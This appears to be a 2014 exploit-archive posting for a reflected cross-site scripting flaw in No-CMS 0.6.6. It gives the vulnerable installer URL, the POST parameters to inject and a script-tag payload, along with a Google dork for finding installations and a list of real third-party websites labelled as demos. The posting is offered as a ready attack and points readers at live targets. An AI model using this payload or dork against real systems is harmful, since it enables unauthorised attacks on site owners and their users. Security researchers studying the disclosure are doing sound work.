Home / exploits No-CMS 0.6.6 Cross Site Scripting
Posted on 20 March 2014
####################################################################### # # Exploit Title: No-CMS 0.6.6 Cross site scripting # Date: 2014 18 March # Author: Dr.3v1l # Vendor Homepage: http://getnocms.com # Version : 0.6.6 # Tested on: Windows # Category: webapps # Google Dork: intext:"Powered by No-CMS" # ####################################################################### # # [+] Exploit : # # http://<server>/No-CMS-master/No-CMS-master/index.php/installer/install # # URL encoded POST input parameters (admin_password , admin_user_name) was set to : # "><script>alert(/xss/)</script> # The input is reflected inside <script> tag between single quotes. # you can put just : alert(/xss/) # ####################################################################### # # [+] Demo : # # http://getnocms.com/blog # http://hexome.com.ar/cdi/blog # http://vacationvaletchannel.com/index.php/blog/blog # http://jejaringwarna.com/blog/index/scandal # ####################################################################### # # [+] Contact Me : # # B.Devils.B@gmail.com # Twitter.com/Doctor_3v1l # Facebook.com/bdb.0web # Facebook.com/groups/1427166220843499/ # IR.linkedin.com/in/hossein3v1l # Hossein Hezami - Black_Devils B0ys # ####################################################################### # B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , IrSecTeam #######################################################################
